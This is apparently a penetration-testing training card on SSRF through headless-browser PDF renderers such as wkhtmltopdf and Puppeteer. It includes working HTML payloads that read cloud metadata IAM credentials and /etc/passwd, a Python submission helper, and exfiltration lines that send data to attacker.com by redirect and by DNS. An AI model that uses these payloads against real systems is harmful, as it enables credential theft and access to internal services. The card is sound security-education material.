SSRF via PDF Renderer: Headless Browser Exploitation for Internal Service Access via HTML Injection

web_injection_logic Difficulty 1–5 30 min certifiable

Theory

Security Assessment Methodology

Headless browser and PDF renderer services — wkhtmltopdf, Puppeteer, Headless Chrome, PhantomJS, WeasyPrint, Prince — accept user-supplied HTML or URLs and render them server-side. When an attacker can influence the HTML that is rendered, the renderer becomes an SSRF proxy: any network request or local file read that the browser engine can perform is also accessible to the attacker.

Renderer identification. The PDF's metadata often reveals the renderer. In most PDF viewers, File > Properties > Description shows the Producer field. On the command line:

pdfinfo report.pdf | grep -E "^(Producer|Creator)"
exiftool report.pdf | grep -E "^(Producer|Creator)"

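Common values: wkhtmltopdf 0.12.6, Chromium 108.0.5359.124, PhantomJS 2.1.1. The renderer name may appear in either field: wkhtmltopdf typically reports itself as Creator while Producer names the underlying Qt version, and Headless Chrome typically reports Skia/PDF as Producer. The renderer version matters: wkhtmltopdf releases before 0.12.6 load file:// and http:// URIs in <img>, <iframe>, and CSS without restriction, whereas 0.12.6 and later block local file access unless --enable-local-file-access is passed.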
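
The identification step can be sketched as a small lookup over the two metadata fields. This is a minimal illustration, not an exhaustive fingerprint database: the function name identify_renderer and the signature list are assumptions made for this example, and real Producer/Creator strings vary between builds.

```python
# Hypothetical helper: map PDF Producer/Creator strings to a renderer family.
# The substrings below are assumptions based on commonly seen values.
SIGNATURES = [
    ("wkhtmltopdf", "wkhtmltopdf"),
    ("phantomjs", "PhantomJS"),
    ("headlesschrome", "Headless Chrome"),
    ("skia/pdf", "Headless Chrome"),
    ("chromium", "Headless Chrome"),
    ("weasyprint", "WeasyPrint"),
    ("prince", "Prince"),
]


def identify_renderer(producer: str, creator: str = "") -> str:
    """Return a renderer family name, or "unknown" if nothing matches."""
    haystack = f"{producer} {creator}".lower()
    for needle, name in SIGNATURES:
        if needle in haystack:
            return name
    return "unknown"


if __name__ == "__main__":
    print(identify_renderer("Qt 4.8.7", "wkhtmltopdf 0.12.6"))
    print(identify_renderer("Skia/PDF m108", "Chromium"))
```

Checking both fields together avoids missing wkhtmltopdf when only the Qt version shows up under Producer.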

Injection vectors:

<iframe src="http://169.254.169.254/latest/meta-data/"> — the renderer fetches the metadata endpoint and includes its content in the rendered frame. The attacker reads the iframe content from the PDF output or from a JavaScript exfiltration callback.
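<script>fetch('http://internal-api/secret').then(r=>r.text()).then(t=>{ document.write(t) })</script>: JavaScript fetch to an internal endpoint; the response body is written into the document and appears in the rendered PDF. Works in Puppeteer/Headless Chrome, but the browser's same-origin policy still applies: a cross-origin response is normally readable only if the internal service sends permissive CORS headers, so fall back to an iframe when the fetch is blocked. wkhtmltopdf executes JavaScript, but its old QtWebKit engine generally lacks fetch and arrow functions; use XMLHttpRequest with ES5 syntax there.
<img src="file:///etc/passwd">: local file read via the file:// URI scheme. A text file is not a valid image, so wkhtmltopdf shows a broken-image placeholder rather than inlining the content, although the renderer's network log or error output may still leak it. Better: use an iframe or XMLHttpRequest with file:// where the renderer permits it (Chrome's fetch does not support file:// URLs).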
CSS @import url('http://internal/') — CSS import triggers an HTTP request; response content can leak if it is valid CSS (the attacker can detect the presence of specific CSS rules via element styling).
<link rel="stylesheet" href="http://attacker.com/log?data="> + CSS injection — if user-supplied CSS is reflected, inject a url() reference to exfiltrate data via HTTP request parameters.

Exfiltration when the PDF body is not directly readable:

Write content to the document title: document.title = secret_data — visible in the PDF metadata.
Redirect to an attacker-controlled URL encoding the data: location = 'http://attacker.com/' + btoa(secret).
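Use DNS exfiltration: new Image().src = 'http://' + btoa(secret).replace(/=/g,'') + '.attacker.com/'. Note that base64 output is case-sensitive and can contain + and /, while hostnames are case-insensitive and limited to letters, digits, and hyphens, with at most 63 characters per label; hex-encode the data and split it across labels when it must be recovered exactly.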
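
The hostname constraints on the DNS channel can be made concrete with a short round-trip sketch. It assumes hex encoding and a placeholder domain, collector.example; the function names are hypothetical, and the overall 253-character limit on a full hostname is not enforced here.

```python
# Hypothetical helpers showing why hex survives a DNS round trip:
# hex digits are valid hostname characters and decode case-insensitively.
MAX_LABEL = 62  # even number below the 63-character label limit


def encode_dns_name(data: bytes, domain: str) -> str:
    """Hex-encode data and split it into DNS-safe labels under domain."""
    hex_data = data.hex()
    labels = [hex_data[i:i + MAX_LABEL] for i in range(0, len(hex_data), MAX_LABEL)]
    return ".".join(labels + [domain])


def decode_dns_name(name: str, domain: str) -> bytes:
    """Recover the original bytes from a queried name, ignoring letter case."""
    prefix = name[: -len(domain) - 1]
    return bytes.fromhex(prefix.replace(".", ""))


if __name__ == "__main__":
    name = encode_dns_name(b"role=demo+/=", "collector.example")
    print(name)
    print(decode_dns_name(name.upper(), "collector.example"))
```

Resolvers may change the case of a query name in transit, which is why the decoder is exercised with an upper-cased name.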

Technical Deep-Dive

<!-- Payload 1: iframe metadata fetch (wkhtmltopdf / Puppeteer) -->
<html><body>
<h1>Report</h1>
<iframe src="http://169.254.169.254/latest/meta-data/iam/security-credentials/"
        width="800" height="400"></iframe>
</body></html>

<!-- Payload 2: JavaScript fetch + document.write (Puppeteer / Headless Chrome) -->
<html><body>
<div id="out"></div>
<script>
fetch('http://169.254.169.254/latest/meta-data/iam/security-credentials/')
  .then(r => r.text())
  .then(role => fetch('http://169.254.169.254/latest/meta-data/iam/security-credentials/' + role.trim()))
  .then(r => r.text())
  .then(creds => { document.getElementById('out').innerText = creds; });
</script>
</body></html>

<!-- Payload 3: file read via XMLHttpRequest (wkhtmltopdf with --enable-local-file-access) -->
<html><body>
<pre id="file"></pre>
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'file:///etc/passwd', false);
xhr.send();
document.getElementById('file').innerText = xhr.responseText;
</script>
</body></html>

import requests

# Submit HTML payload to a PDF generation endpoint and extract rendered content
def exploit_pdf_ssrf(
    pdf_endpoint: str,
    html_payload: str,
    param_name: str = "html",
) -> bytes:
    """Submit malicious HTML to a PDF renderer and return the raw PDF bytes."""
    resp = requests.post(pdf_endpoint, data={param_name: html_payload}, timeout=30)
    resp.raise_for_status()
    return resp.content

# Extract text from resulting PDF (requires the pdfminer.six package; pdftotext is a command-line alternative)
def extract_pdf_text(pdf_bytes: bytes) -> str:
    import io
    from pdfminer.high_level import extract_text
    return extract_text(io.BytesIO(pdf_bytes))

# Usage:
# pdf = exploit_pdf_ssrf("https://target.example.com/generate-pdf", PAYLOAD_2)
# text = extract_pdf_text(pdf)
# print(text)

# Identify renderer from PDF metadata
exiftool output.pdf | grep -E "(Producer|Creator)"
pdfinfo output.pdf

# Extract text from PDF to find SSRF output
pdftotext output.pdf - | head -50

# Test wkhtmltopdf file:// access locally (confirm renderer behaviour)
# On 0.12.6 and later, add --enable-local-file-access before the "-" input argument
wkhtmltopdf - /tmp/test.pdf <<'EOF'
<html><body>
<script>
var x = new XMLHttpRequest();
x.open('GET', 'file:///etc/passwd', false);
x.send();
document.write('<pre>' + x.responseText + '</pre>');
</script>
</body></html>
EOF
pdftotext /tmp/test.pdf -

Common Assessment Errors

1. Not checking if JavaScript is enabled. Upstream wkhtmltopdf enables JavaScript by default, but some builds, wrappers, or deployments turn it off (for example with --disable-javascript or an equivalent configuration option). If JavaScript payloads produce no output, try non-JS vectors (iframe, img, CSS import) before concluding that the renderer is not exploitable.

2. Assuming synchronous rendering. Puppeteer and Headless Chrome render pages asynchronously. A fetch() call may not complete before the renderer captures the PDF snapshot if waitForNetworkIdle or an adequate delay is not configured. If the PDF output is empty where dynamic content is expected, the renderer likely captured the page before the fetch resolved.

3. Missing wkhtmltopdf local file access flags. Since 0.12.6, wkhtmltopdf blocks local file access by default; file:// reads succeed only if the service passes --enable-local-file-access or --allow <path>. Cloud-deployed instances often omit these flags, blocking file:// reads. Fall back to HTTP-based SSRF (iframe, img src http://) when file:// fails.

4. Ignoring PDF metadata as an exfiltration channel. When the PDF body is heavily sanitised (e.g., iframe content is not rendered visibly), the document title and author fields may still reflect injected JavaScript assignments (document.title = secret). Always inspect all PDF metadata fields, not just the body text.
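
A small parser over pdfinfo output makes it easier to review every metadata field rather than just the body text. This is a sketch under assumptions: the helper names are hypothetical, and the choice of Title, Author, Subject, and Keywords as the fields worth flagging is illustrative rather than a property of any particular renderer.

```python
import subprocess

# Fields assumed, for illustration, to be the ones injected content may reach.
TEXT_FIELDS = ("Title", "Author", "Subject", "Keywords")


def parse_pdfinfo(output: str) -> dict[str, str]:
    """Turn pdfinfo's "Key:   value" lines into a dictionary."""
    fields = {}
    for line in output.splitlines():
        key, sep, value = line.partition(":")  # split on the first colon only
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def populated_text_fields(fields: dict[str, str]) -> dict[str, str]:
    """Return the free-text metadata fields that are present and non-empty."""
    return {k: fields[k] for k in TEXT_FIELDS if fields.get(k)}


def pdfinfo_fields(path: str) -> dict[str, str]:
    """Run pdfinfo on a file (requires poppler-utils) and parse its output."""
    result = subprocess.run(["pdfinfo", path], capture_output=True, text=True, check=True)
    return parse_pdfinfo(result.stdout)
```

Typical use would be populated_text_fields(pdfinfo_fields("output.pdf")), followed by a manual comparison against the values the application is expected to set.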

5. Not testing internal hostnames vs. IP addresses. Some renderer environments have DNS configured to resolve internal hostnames (e.g., http://internal-api/) while blocking 169.254.169.254 via iptables. Enumerate internal DNS names from error messages, JavaScript source, or other leaks before concluding the metadata endpoint is unreachable.

6. Confusing SSRF via renderer with XSS. Both involve injecting HTML/JavaScript, but SSRF via renderer is a server-side issue: the payload executes in the headless browser running on the server, not in another user's browser. The impact — server-side file reads, internal network access, credential theft — is fundamentally different from stored XSS.
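
One way to confirm where a payload executes is a harmless probe that prints the user agent and page URL into the document, followed by a check of the extracted PDF text. The sketch below is illustrative: PROBE_HTML, classify_execution_context, and the user-agent markers are assumptions for this example, and a renderer configured with a custom user agent would not match them.

```python
# Benign probe: writes the executing browser's user agent and URL into the page.
# ES5 syntax is used so older engines such as QtWebKit can run it.
PROBE_HTML = """<html><body>
<pre id="probe"></pre>
<script>
document.getElementById('probe').innerText =
  'UA=' + navigator.userAgent + ' URL=' + location.href;
</script>
</body></html>"""

# Assumed user-agent substrings for common server-side renderers.
SERVER_SIDE_MARKERS = {
    "HeadlessChrome": "Headless Chrome",
    "wkhtmltopdf": "wkhtmltopdf",
    "PhantomJS": "PhantomJS",
}


def classify_execution_context(pdf_text: str) -> str:
    """Interpret text extracted from a PDF generated from PROBE_HTML."""
    if "UA=" not in pdf_text:
        return "inconclusive"  # script did not run or output was stripped
    for marker, name in SERVER_SIDE_MARKERS.items():
        if marker in pdf_text:
            return f"server-side: {name}"
    return "executed, renderer not recognised"
```

If the probe output appears in the generated PDF with a headless user agent, the script ran inside the server's renderer rather than in a visitor's browser, which is the distinction this item draws.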

Challenge Lab

Reinforce your learning with a hands-on generated challenge based on this card's competency.